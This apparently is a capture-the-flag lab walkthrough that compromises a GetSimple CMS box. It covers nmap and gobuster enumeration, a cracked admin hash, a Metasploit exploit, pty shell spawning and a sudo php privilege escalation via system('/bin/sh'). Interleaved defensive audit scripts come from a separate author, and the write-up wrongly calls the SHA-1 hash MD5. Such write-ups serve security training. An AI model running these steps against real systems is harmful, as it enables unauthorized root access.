Knowledge Check
TARGET IP: 10.129.42.249
OSINT (Check Browser)
Start by checking out the IP on a browser
Looks like the URL runs off of GetSimple CMS.
It looks like it is the default page for the program.
A quick Google search shows default credentials:
newuser:password
siteadmin:password213
None of these worked.
However, I did find a possible workaround if I can get access to the system:
Edit file: data/users/youruser.xml
Change field:
<PWD>YOUR_ENCRYPTED_PW</PWD>
to
<PWD>011c945f30ce2cbafc452f39840f025693339c42</PWD>
Save. New password should be 1111
Checked the source code for anything that sticks out. Didn't find anything to note.
Checked the /robots.txt directory and discovered another link to a /admin page.
Checked out the /admin page and found a login page for the gettingstarted app.
I tried admin:password for the username:password. It did not work. I got an error message:
Error: Login failed. Please double check your Username and Password
Run nmap on IP and see what ports are open. Start with basic nmap scan and refine:
nmap --open -Pn [TARGET_IP]
I'm using the -Pn option because it looks like it is blocking my pings. This took a while.
Nothing popped up. So I ran the basic nmap again and it seemed to work this time.
nmap --open [TARGET_IP]
Port 22 and 80 were both open which makes sense for a webserver. I went ahead and ran a basic nmap scan on all ports to see if anything else was open:
nmap --open -p- [TARGET_IP]
Nothing was popping up because it was saying it was blocking my ping probes. Might want to retry if I hit a roadblock somewhere else.
I went ahead and ran a more detailed scan on ports 22 and 80:
nmap -sV -sC -p 22,80 [TARGET_IP]
Output:
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
|   256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_  256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin/
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It looks like the server is Linux.
SSH Version: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
The host keys are listed above.
Port 80 is running Apache Version: Apache httpd 2.4.41 ((Ubuntu))
Ran gobuster on TARGET_IP and came up with some more extensions:
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
Can't get access to these.
I checked the cookies on the request:
GS_ADMIN_USERNAME:admin
4bc774744b09f4bb3746b641176918d9f52ef9b9:"93faf1706c6b62a18553fe3cdf4e4c1015c73760"
I tried MD5 and base64, UTF-8, and ISO-8859-1 (found it in the header). No go...
Need to look at other methods to decrypt and then use Burp Suite to change the cookie and try to get access.
/admin (Status: 301) [Size: 314] [--> http://10.129.42.249/admin/]
Sign-in page.
/backups (Status: 301) [Size: 316] [--> http://10.129.42.249/backups/]
Empty. But I can create a zip file of a backup of the system. I might be able to dig through the zip file and find something in here that would help.
/home/user/Desktop/_var_www_html_backups_zip_2023-02-01-0300_41_archive.zip
/.htaccess (Status: 403) [Size: 278]
Can't get access.
/data (Status: 301) [Size: 313] [--> http://10.129.42.249/data/]
Look into this extension for possibly changing the password above.
Checked out users/admin and found out one of the usernames is admin. Looks like the password is encrypted but will look into decrypting it. Doesn't look hashed.
d033e22ae348aeb5660fc2140aec35850c4da997
I used CrackStation to look it up.
Holy cow! It's an MD5 hash that translates to... wait for it...
admin
I now have access to the admin account with admin:admin credentials. Email is admin@gettingstarted.com
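GetSimple's default passhash() is the unsalted SHA-1 of the password, which is why the 40-hex-character PWD values in data/users/*.xml (the 011c9... substitution earlier and the admin hash just found) can be looked up directly. As an added audit example, not part of this write-up or of GetSimple itself: parse one user record and flag it when its stored hash equals a known default or weak password. The XML record and the word list are constructed; a salted install (GSLOGINSALT set in gsconfig.php) would need the salt applied the way GetSimple applies it before comparing.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample in the layout of a GetSimple data/users/<user>.xml record (not a real file).
SAMPLE_USER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<item>
  <USR>admin</USR>
  <NAME></NAME>
  <PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
  <EMAIL>admin@example.com</EMAIL>
  <HTMLEDITOR>1</HTMLEDITOR>
  <TIMEZONE></TIMEZONE>
  <LANG>en_US</LANG>
</item>
"""

# Short constructed list of vendor defaults and weak values; extend it from your own password policy.
WEAK_PASSWORDS = ["admin", "password", "password213", "1111", "123456", "changeme"]

HEX_DIGITS = set("0123456789abcdef")


def gs_passhash(password):
    """GetSimple's default hashing: sha1(password) with no salt (GSLOGINSALT unset)."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def parse_user_file(xml_text):
    """Return (username, stored_hash) from a GetSimple user record."""
    root = ET.fromstring(xml_text)
    return root.findtext("USR", "").strip(), root.findtext("PWD", "").strip().lower()


def audit_user_file(xml_text, weak=WEAK_PASSWORDS):
    """Flag a user whose stored hash matches a weak/default password or is not a sha1 digest."""
    user, stored = parse_user_file(xml_text)
    findings = []
    if len(stored) != 40 or not set(stored) <= HEX_DIGITS:
        findings.append("PWD is not a 40-char sha1 hex digest (corrupt or tampered record)")
    matched = next((p for p in weak if gs_passhash(p) == stored), None)
    if matched is not None:
        findings.append(f"password for '{user}' equals weak/default value '{matched}'")
    return {"user": user, "weak_password": matched, "findings": findings}


if __name__ == "__main__":
    print(audit_user_file(SAMPLE_USER_XML))
```

Run it over every file in data/users/ on an install you administer; any hit means the account needs a new password, and the directory itself should not be readable through the web server at all.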
I have admin access to the account. From here it looks like I can create a page. I can access the file system in /data/pages for the pages. I should be able to gain access to the system from here by adding a new file
On the data/other/authorization.xml I found an API Key:
4f399dc72ff8e619e327800f851e9986
On /data/other/logs/ I found a log of all failed login attempts, including my own.
On /data/cache/ I found a .txt file specifying that we are running on an old version. Confirmed that this is the GetSimple version, which is 3.3.15. Need to check for exploits.
{"status":"0","latest":"3.3.16","your_version":"3.3.15","message":"You have an old version - please upgrade"}
/index.php (Status: 200) [Size: 5485]
Home.
/plugins (Status: 301) [Size: 316] [--> http://10.129.42.249/plugins/]
There are some .php files in here but I can't see the contents of them.
/robots.txt (Status: 200) [Size: 32]
Found /admin in here.
/server-status (Status: 403) [Size: 278]
Can't get access.
/sitemap.xml (Status: 200) [Size: 431]
Looks like nothing important?
/theme (Status: 301) [Size: 314] [--> http://10.129.42.249/theme/]
Looks to be mainly style files.
I checked Metasploit and it looks like there are two exploits available for GetSimple:
The first one didn't work with the credentials I provided. However, the second exploit worked, as it targets the version of GetSimple that the website is running, which is outdated.
I had to redirect to the /home/mrb3n directory but found the user.txt file with the flag:
7002d65b149b0a4d19132a66feed21d8
I then used the shell command to drop into a shell and a slightly better terminal. I ran the following to get a better console:
python3 -c 'import pty; pty.spawn("/bin/bash")'
I ran sudo -l:
(ALL : ALL) NOPASSWD: /usr/bin/php
I checked GTFOBins for possible root escalation:
https://gtfobins.github.io/gtfobins/php/#sudo
CMD="/bin/sh" sudo php -r "system('$CMD');"
Ran the above and got root privileges.
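The sudo -l line above is exactly the kind of entry a hardening review should catch before anyone reaches it: any interpreter or shell runnable as root, password or not, is a full root grant. As an added example that is not from this write-up or from GTFOBins, the script below parses sudo -l output and flags such rules, noting NOPASSWD as the aggravating factor. The sample output and the CODE_RUNNERS set are constructed for the example.

```python
import re

# Constructed sample of `sudo -l` output; the php line mirrors the one found on the box.
SAMPLE_SUDO_L = """Matching Defaults entries for mrb3n on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mrb3n may run the following commands on this host:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
"""

# Programs that execute arbitrary code or spawn a shell when allowed under sudo (GTFOBins "sudo" entries).
CODE_RUNNERS = {"php", "python", "python2", "python3", "perl", "ruby", "node", "sh", "bash",
                "dash", "zsh", "vim", "vi", "find", "awk", "less", "more", "env", "nmap"}

# A rule line: "(runas) TAG: TAG: command[, command...]"; tags such as NOPASSWD: are optional.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s+((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Turn the rule lines of `sudo -l` output into dicts with runas, tags and command."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and headers are not rules
        runas, tags, cmds = m.groups()
        tagset = {t.rstrip(":") for t in tags.split()}
        for cmd in cmds.split(","):
            rules.append({"runas": runas.strip(), "tags": tagset, "command": cmd.strip()})
    return rules


def risky_sudo_rules(rules):
    """Return (rule, reason) pairs for rules that hand out root-level code execution."""
    findings = []
    for r in rules:
        argv = r["command"].split()
        prog = argv[0].rsplit("/", 1)[-1]
        if r["command"] == "ALL":
            findings.append((r, "unrestricted ALL command"))
        elif prog in CODE_RUNNERS and len(argv) == 1:
            # Bare interpreter with no fixed arguments: the caller chooses what it runs.
            why = "interpreter/shell with caller-controlled arguments"
            if "NOPASSWD" in r["tags"]:
                why += ", no password required"
            findings.append((r, why))
    return findings


if __name__ == "__main__":
    for rule, why in risky_sudo_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{rule['command']!r} as {rule['runas']}: {why}")
```

The fix on the target side is to drop the entry or pin it to one script with fixed arguments; a bare /usr/bin/php under sudo is never safe.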
Went to the /root/root.txt and grabbed the flag with a minute left on the machine:
f1fba6e9f71efb2630e6e34da6387842